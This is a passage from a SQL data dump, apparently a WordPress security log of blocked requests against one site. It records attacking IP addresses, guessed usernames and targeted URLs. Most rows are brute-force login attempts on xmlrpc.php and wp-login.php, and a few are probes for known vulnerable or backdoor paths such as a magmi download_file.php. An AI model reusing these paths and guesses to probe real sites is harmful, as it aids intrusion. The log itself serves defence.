C3JZsf1dbL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.221',3110826205,'newd',0,1665695072.3067,152,'NW2nO9J5ERh7AZkr1di3b0Ly','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1665694857.5240,7,'Z5beXw8DW6OHGg9VxaLKi3Er','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.186.242.173',1572532909,'admin',0,1665713728.5268,152,'NYReEO3pJqloVBIxWjnLT74F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.247.161',2067330977,'john',0,1665712327.6375,152,'uJcVlSdD3yo4kO8GPjzFAhQC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.207.190',860868542,'test123',0,1665712326.8842,152,'N9gyX53kU7wHD4nPCLfuEiex','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.140.8',1138854920,'admin',0,1665712323.3541,152,'Slhit4y9gePvqdNaoFHDpcBW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'admin',0,1665712316.9999,152,'UJzaH5VYKtRbAexnu9D3iOPF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.73.146.148',1581879956,'admin',0,1665712307.9151,152,'Z8157KaJ0smolG9QNz3XVE62','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.81.72',1386565960,'admin',0,1665712307.2142,152,'7GKrZDbLiMQ82SfENUzOyVTB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'jsjobs_jobseeker',0,1665712301.3542,152,'XLCDU7t4QjPBA5bw1HWg3NTo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.54.251.167',1731656615,'admin919',0,1665712296.4405,152,'xgFnECKuYGBR6d3m5vNLT9cM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.201.186.254',2915678974,'abc',0,1665712287.2263,152,'aP2yIBDRgirTbsXpKCmWfuco','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.60',90545212,'test',0,1665712280.1003,152,'0SJC2B4gQaWvTp9jeyDbHLVG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.207.190',860868542,'test',0,1665712280.0924,152,'y8dmUjYkovezEBgsbn2Dc0IO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.53.42.220',2587175644,'preview',0,1665712280.0129,152,'UX3PSmEo6qOHd7wpQDBlGFWu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.84.97',2319733857,'newd',0,1665711910.5147,7,'FI2QTdof9Gr5E4cakVguwYXs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.168.115.171',3098047403,'editor',0,1665711712.8267,152,'W7OSNl3w9t4ZBAPdbDFpsu5j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.30.32.94',3105759326,'abc123',0,1665711708.5271,152,'TYND4rez7yLac5fikm1URwFt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.114.64.93',2809282653,'user',0,1665711705.6916,152,'Yrfw5dZez29BilkuUj7GEDbM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.228.32.9',1122246665,'test',0,1665711704.0851,152,'L6YIekK9svOZ08tnqNC2SMoa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1665700592.0643,7,'GIrQJUOXhTWmwVAMx0KcZk29','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.30.32.94',3105759326,'admin',0,1665699983.9880,152,'ADmWva0wekQI8KJTVS5LYdih','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.30.32.94',3105759326,'wordcamp',0,1665699983.7603,152,'SkdoxLAz6MWXmvflb9J0YK5B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.11.36.228',520824036,'Admin',0,1665699969.9190,152,'4mMizCZb7Wn0ExpNj2IBeLXc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.162.51.22',312619798,'admin',0,1665699969.2015,152,'RNeVq81XiGTwhHZ3A7EmxkPC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.30.32.94',3105759326,'admin',0,1665699968.5852,152,'1OUndJKEQHWtfAPTMDsZeu3g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.92.169.121',2757536121,'test',0,1665699954.4057,152,'4YBwvMrl1uycGXp8nxmQ7hJf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'123456',0,1665699953.9810,152,'rBAcUtIDjpNR75LvlWe9uVEP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'xrumertest',0,1665699947.0365,152,'3PIHYCym7loFX2Mkzqw1iE4s','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.229.251.165',1877343141,'Admin',0,1665699943.0130,152,'CYyqfHu62WG57Aa18eJvjRni','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.86.9',1735284233,'admin',0,1665699932.0294,152,'fctyK9sgu6HxiPUnCIJYLr3b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'admin',0,1665699923.5775,152,'l3sTWZn5wRJfa0UEzDLPS6Od','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.77.159.5',3494747909,'demo',0,1665699922.8808,152,'pIEMYmFjnBd8kuf9crh2vLZt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.2',3355043330,'joyce',0,1665699918.7655,152,'fkST4YQX2gslLqRxErvJCV81','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.56.99.136',2453169032,'newd',0,1665699698.7817,7,'seLaxq7rfih3QgMXJ9R0d8By','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('49.12.114.46',822899246,'test2',0,1665711693.0747,152,'ltEMgzykZxFn8qi5OvC2r6AI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'wp_updates',0,1665711689.4575,152,'iQGlCBR8dKavcE7w2XtWrLOm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'root',0,1665711687.3688,152,'c0mFJnh9MKSOENYdxuZD871k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'Admin',0,1665711670.4072,152,'qUtGYHEAWRkjFrXod48i2nK9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.64',1386567232,'hamid',0,1665711670.4071,152,'NxKcSsr9La1OAPleWfgIE6Jb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.221',3110826205,'test',0,1665708572.2331,152,'xGTy3s2X9wBdUceRkHKglPoF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'a',0,1665708568.8023,152,'0vkxcXpGQh2nzS3M8CK1aTqI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'admin',0,1665708558.4956,152,'yFX5YS6gd7MBqZG2wsD3nWTh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.222.89',2261900889,'abcd',0,1665708557.8954,152,'6QWtskzHuVKNDTbywo4UqO7a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.255.174.93',1761586781,'Admin',0,1665708545.7395,152,'LDyM7jz5SErlOkUxVaZp8ewN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.59.164.178',3258688690,'test',0,1665708542.3308,152,'w0VAvOp4o7BQXfjMHk56cbsS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.140.132',1138855044,'1234',0,1665708535.6001,152,'GsiFIOa26bMlRfnLJHgAvKEt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.155.93.241',1738235377,'username',0,1665708535.1815,152,'UaOfbSG0w1QyoIY49l3djHqT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.255.174.93',1761586781,'12345',0,1665708524.3818,152,'iyLGBgJ1lAtPVbzUEN9dcmkS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.227.144.244',1138987252,'demo',0,1665708524.3429,152,'dU37ueQ90ywZtJFlDqSpkbCs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'abc',0,1665708524.3428,152,'gacnreqCzhOLU2Pw7f1dI3mb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.102.179',2372036275,'joyce',0,1665708116.2769,152,'D0fcAyMIEzG3OnlvWp4eTNsF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665707951.0468,7,'f5r4MvOjd0lSNgF9JH1hPopY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.75.130.25',860586521,'teste',0,1665707222.0126,152,'nOWskmQrPadohqejS5D7bYfx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.69.253',2769700349,'garak',0,1665706568.8196,152,'dbaRcx2XWnFpqmzlisHLP1Iu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.151',1434488727,'admin',0,1665706568.8195,152,'WGpZYOJa0lzB1c4fdvkqNbFw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.78.225.32',223273248,'newd',0,1665705512.8483,7,'D5RMNXuIq91H0tUl7hPFLnwc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1665704629.5742,7,'aDBeQjJVOWvisU2knI83t7fd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('135.181.119.15',2276816655,'guest',0,1665704129.3731,152,'u2x0wsagYkfmFBoVHdb4hR87','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.132.134.40',2391049768,'demo',0,1665704120.9596,152,'hrtD7HQezB5IR4TqaZ3A8o9j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.237.52.22',585970710,'test1',0,1665704111.3206,152,'KtdGBR96a35S82AMhcmYwz4p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.140.8',1138854920,'test',0,1665704108.5455,152,'aCP3GQoV4YBsXtvdA2gpnEWq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'Admin',0,1665704096.5955,152,'cKL86r0sFDYHnE2OWkepUzPm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'123123',0,1665704095.7939,152,'4N5JqimlbOt7uahX301WSUVI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.66.113.129',574779777,'testuser',0,1665704088.1256,152,'c5HQJADwuO7feYKhX4lWr1LE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'admin',0,1665704087.9199,152,'HlTOFbxsE4LnzSIjC3Mp9ZtJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.128.80',2487386192,'test',0,1665704085.7791,152,'GlgZtSCYfrd0MVqWbwAuLT7F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.228.157',3634291869,'12345678',0,1665704076.2004,152,'SNVA6cHh4rJpvqTYgwnFxDs2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.142.146',1138658962,'123456789',0,1665704076.2004,152,'R8IWNsOypkSwgYrGjKVX3M2l','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.156.240',908434672,'newd',0,1665703031.5356,7,'jCO6HWVMfmEoABeUhZIb10yw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.60.66',1729838146,'test1',0,1665707209.3836,152,'70HFoJGrUIpYlREc8iAZBMfg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.64',1386567232,'denise',0,1665707200.3083,152,'E5lUw8SPxTiMOcIedXzt91hf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.87.67',2371770179,'yanz',0,1665707200.2150,152,'grP4bzaOY7NxCh8udk5jqlWD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.90.217',2707512025,'admin',0,1665707194.6882,152,'OxwQ6MJqUzGLAacKXtNn198P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.162.51.22',312619798,'cem',0,1665707192.9651,152,'d6SBJXnMNjG2m1kt4xITVDzA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'test1',0,1665707178.5265,152,'IwjUFD84aPKgdluo6Z1eVvBW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.26.178.66',874164802,'user',0,1665707174.3629,152,'onq3NteQHShIY78AxikuF0d1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.243',3324401907,'1',0,1665707174.2101,152,'NgTVOodU4Z8uXecjzwL5vJIF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'1234567890',0,1665707169.4086,152,'Qg8uTp6x5AqPfNlaLUdt34sR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.47.206',861482958,'newd',0,1665707038.3873,7,'gxDILUy5s02W1jbRevuiMpqh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.121.252',3451484668,'Joyce',0,1665706817.3374,51,'Faxuo9XvzVtYZ3P6l4d0pDQg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.136.107.178',763915186,'test',0,1665706613.0694,152,'fUOJd4YQgBExyvoKmr0lZ2HV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'1234567',0,1665706608.6964,152,'CKzW4cNw5UFnxR9Ba0rP6TqS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.140.132',1138855044,'test',0,1665706602.0104,152,'n9c5K7oRgBIP8VsCtZrmpidT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'admin',0,1665706595.9438,152,'HQiYCtfT4XjhOAzkNynExlsG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'admin',0,1665706591.7762,152,'Yr1o9ZBGODIsQw0pEcLTmgkK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.27.18.147',2015040147,'private',0,1665706586.3195,152,'G8sWjFqbHKvJY4TRX5QhdBpn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.202.42',2673461802,'test2',0,1665706576.5853,152,'SPNJBtjCAvo5W1XLgdHGl3r7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'admin',0,1665706573.9089,152,'26VZHiDhcy4dm1bA9MeS5KNu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.119.158',2808313758,'admin',0,1665711670.4035,152,'em9HgxCOkpnBiAV3uSNUYf4y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.36.111.59',3257167675,'Joyce',0,1665711152.4613,152,'uk2w69gcKLYBCzrTm5WXSGla','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.36.111.59',3257167675,'joyce',0,1665711097.1058,152,'yoMa4smfR19zVSw7nT5ghYpb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1665710386.6861,7,'yCdaU1Oec7whTXljIrsN0LBp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.35',3583549731,'joyce',0,1665709948.1510,152,'JLTk1IC6ouyVcehtS5pNOr7G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.243.95.160',2045992864,'newd',0,1665709481.0309,7,'ujxKWrSC2nkFgDbV5UJlHQya','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.13.81.56',856510776,'test3',0,1665713723.9124,152,'VcrAWmTBOC6h51iZPkNexDtu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.235.194.70',401326662,'admin',0,1665713713.0395,152,'uxlMOo2knaShFbIHBzg5W4eG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'AdMiN',0,1665713712.8149,152,'y1cSsuVHbkxCtFg49GIAZU7T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.127.114',2335932274,'admin',0,1665713707.3778,152,'MQklOp7KDn68SPBfIe0XG3Rq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.148.136.176',3650390192,'admin',0,1665713699.2011,152,'zmPDpg4WUBYeGKxldCuQFq98','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.148.106.163',2224319139,'test',0,1665713696.0483,152,'Mdm7B9R5GCgyJUzsST4AQODa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.127.114',2335932274,'cr4p5',0,1665713695.5114,152,'0MYwjZAOU1HisLaKfnXBxtN4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.30.32.94',3105759326,'tester',0,1665713684.0888,152,'VuZItBSf9nL4NUdET7xzheMK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'admin',0,1665713682.7717,152,'MPExDIhiCXwetf3K8BUpA7g6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.229.251.165',1877343141,'demo1',0,1665713677.3983,152,'iRuFXcGpQ875O2JxwZaTDe6v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.163.7',3265504007,'master562',0,1665713677.3893,152,'Afkb8TPgSyDeoXEH0Qu4LsMB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.86.9',1735284233,'teste',0,1665713677.2559,152,'eBNzv0CgVSLPEiYoG523hMqb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.180.18',3497112594,'newd',0,1665712819.0069,7,'JvwacTsMNRKyIQ6quVlhg58b','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('59.106.13.177',996806065,'test',0,1665716864.0059,152,'pxscVIPCLBAH17j2GRzgu8oE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.70.114.151',3242619543,'admin2',0,1665716854.4800,152,'zZWPwHoOygAD12lhpfaKxtn6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.232.160',2487806112,'patricia',0,1665716852.8388,152,'LDXYcI2qZTOz4GJHj56fEKui','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.1.224',1556939232,'admin1',0,1665716849.4309,152,'DXMKekNu4GJLx82bPvfZ6zUq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.193.106.55',717318711,'test1',0,1665716846.3750,152,'QGO72HNYSWn3LxbocTq4BKX1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.60.49',600456241,'admin',0,1665716843.2002,152,'Z1ahNQ0IWYGVU4dFk7ou6tzP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.22.104',1152849512,'baiwan',0,1665716841.3242,152,'LMinxeU4XbBFQVjJzADq0KWy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.163.7',3265504007,'admin2',0,1665716840.8967,152,'gHr5EtSTPyKCd6ha4jnlDqxk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.221',3110826205,'andro',0,1665722038.6066,152,'aWu6oT9Xsyqngvmeb2ML0NjK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.152.110.183',1754820279,'admin',0,1665722034.3478,152,'QbLs9pGgKFOJH0ZIkSX37qaD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'Admin',0,1665722030.6600,152,'E48hpHmeoxI3Bw7nrKDOqu5F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'admin2',0,1665722030.6373,152,'pf2qlhN50jy7sQGvJ93zAMUX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.75.65.218',575357402,'newd',0,1665721685.9369,7,'cvSJDUnqkwaMXg13ACOBKFbj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1665720149.9273,7,'Cey26gu8B7JUnwH05voWpPaK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.109.117',2673438069,'newd',0,1665726439.1941,7,'T7S6dhRMgwC5Vyj0uOqBmJes','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1665724978.9669,7,'bKBWXhM6AVwnU7qzQJrTPH25','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1665724081.2399,7,'4DS0EYzUVoTf7wsCrIqLORt9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.132.134.40',2391049768,'developer',0,1665723987.1792,152,'jaKd1v0GUr8mRX9LqsTuNnl5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.243.228.84',1307829332,'123456',0,1665723981.1392,152,'ncrCGxFDUu720viWdOzkAaLP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.155.93.241',1738235377,'admin',0,1665723977.0206,152,'SpnFhYxa86EUJewAsliMP5qW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.128.32',1959428128,'test4',0,1665723966.1361,152,'CzhJfq2iu0cajvkDASKPBGQN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.216.119.106',3117971306,'robin',0,1665723960.6038,152,'CaLW58D9nR34BFVEmiQeJf6T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('182.61.51.214',3057464278,'alex',0,1665723958.6766,152,'dThBVaLzKjQbo2kwlRxYMA3p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.77.133',866078085,'john',0,1665723951.5464,152,'2euAwODMWyGoFkJXZi1zpdVL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.176.79',1137553487,'karen',0,1665723948.2624,152,'7HaGVEqZxU0myIelo6Q5cgjz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.163.7',3265504007,'admin',0,1665729776.2816,152,'CylsJHGt30mEzxqa62gPXSrO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'wakgos',0,1665729759.5247,152,'OkaXHlhoRCmI21ENfJcsxgAy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.232.6.17',2229798417,'admin',0,1665729747.0066,152,'3eAo59W4GQ8OBthRiqKI2lyz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.15.115',2649100147,'newd',0,1665729731.5600,7,'yMaQiZltJoP1NELkB3VH9Gu6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.195.254.123',3351510651,'Joyce',0,1665729388.5881,51,'t2NMEKzXrqgBsbU4RiSH0e7Y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1665728838.4924,7,'J7pHUNrCFzLGlVIhO9bfB0s5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.89.47.206',861482958,'newd',0,1665727324.8242,7,'pjUsXvkYQWb3nNgTFo4PH9Zi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('2.59.119.2',37451522,'bunyawee',0,1665731717.3004,152,'n4WIeZhzxiK5tfJNpLEdB9jS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.87.63',1386567487,'admin',0,1665731713.6925,152,'DPLEafNHl2KmSQUub3TJ0CcO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('156.67.211.101',2621690725,'justin',0,1665731713.6151,152,'rQjCElHovaBsJNuDpqmG8LFi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1665731274.1360,7,'o4QlebWEF9NKUyZ2RaXM5HPj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.223.170.181',2682235573,'newd',0,1665737070.7931,7,'9pfAM5dPkYrFVjxCHn6cgITB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('8.142.173.121',143568249,'newd',0,1665736158.9031,7,'uvtrLoMZcs5fJpIQRWHe7DgO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.148.16.211',3247706323,'Joyce',0,1665735189.9852,152,'rdEK4L9XVFlqo8nfhsbZjpQv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1665734600.6774,7,'hSkIv08gpKTsqef9VAy5LOFr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665742050.2914,7,'EWjaS9C8RYPoeTg0MHfl24Kb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.221',1364735197,'newd',0,1665741129.9021,7,'scI327n6jgDwhPQfHyNYR5i1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.211',3091980243,'joyce',0,1665740649.0023,152,'LRCA1sFgiNIcdw8q5x47SpzK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.162.212.214',2997015766,'joyce',0,1665740599.7028,152,'BEqeP67aV3xrXm2bjdy4vNp8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.129.222.91',1736564315,'newd',0,1665738643.8684,7,'ni4D6bZuAVex51a8JcBgpSMl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1665746140.6393,7,'sQT9lzcLDBfXeV3rRO1vY20h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.63.80.162',775901346,'newd',0,1665744559.2450,7,'iAp7leL04PKk18u56VtsQzvm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('115.78.122.58',1934522938,'newd',0,1665743634.5624,7,'y6kgPZCdLTIK3H7wF2Me9frx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.219',3583549915,'Joyce',0,1665742741.8548,152,'fzet1MpE9HY04ZyXPAx5aKwD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1665748670.0288,7,'WV4UrI0qxiBGCwtFhb6akpQe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.37',3355043365,'Joyce',0,1665748099.0422,152,'ez1fVEK9H6a4IYAmWRtoU28g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.223.227',3091980259,'joyce',0,1665747263.3321,152,'H1zhuLSb3v4wecCt89DKsmMA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.96.126',2335924350,'newd',0,1665747085.2750,7,'9YS78wRAVplErh6nHaNiLq5I','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.169.175.22',3265900310,'',0,1665746556.5196,55,'rAtKFLOufb1w9VMpNqnohB7G','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('188.165.198.224',3164980960,'newd',0,1665752130.0053,7,'MP2cd8ReLJnV7kOUKafN5bGl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665751196.6717,7,'wY5SOaBsHZTujXAzoUR2gkyJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.225.235',3165053419,'newd',0,1665749597.0574,7,'SRH4rwxV6dukopTDBah5zlNX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.51.74',3328324426,'Joyce',0,1665749248.7266,51,'XOhRVu8oI1YW2PUkjEKDf7am','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.9.19.107',3104379755,'joyce',0,1665755535.0979,152,'xJoHkbt4uFOAw5Iv2eDpzSdG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.240',3583549936,'Joyce',0,1665755353.0193,152,'PNfrOkbaHUi08Xo2wedjgqS1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.41.221.5',1747574021,'newd',0,1665753732.6681,7,'hd1HJTC8bADE6rNBMkVQLF5p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.49.253',3515691517,'Joyce',0,1665753025.3424,51,'r9FQYDo0M7lIbAHh8m412qBT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.37.81.45',908415277,'',0,1665759332.1429,55,'Jq2nLseufKDyG9pcHY4ExW8k','','19|0|0|0|cteisys.com/about.php',0,19,0),('171.22.30.253',2870353661,'',0,1665764517.5680,55,'dC78N4fgouqWOs2k0Bp3A9nK','','19|0|0|0|cteisys.com/magmi/web/download_file.php',0,19,0),('171.22.30.253',2870353661,'',0,1665764513.2787,55,'zvGg3yJETR2Zh8iAnlMSIrkL','','19|0|0|0|cteisys.com/magmi-importer/web/download_file.php',0,19,0),('107.189.13.99',1807551843,'Joyce',0,1665761622.2526,51,'odFwaxSOJAcNyhHV6l4v8UEX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.172.138.41',2997652009,'',0,1665798773.3818,55,'HjyR8aQYkur4O7PnL2CBUZdh','','19|0|0|0|cteisys.com/wp-static.php',0,19,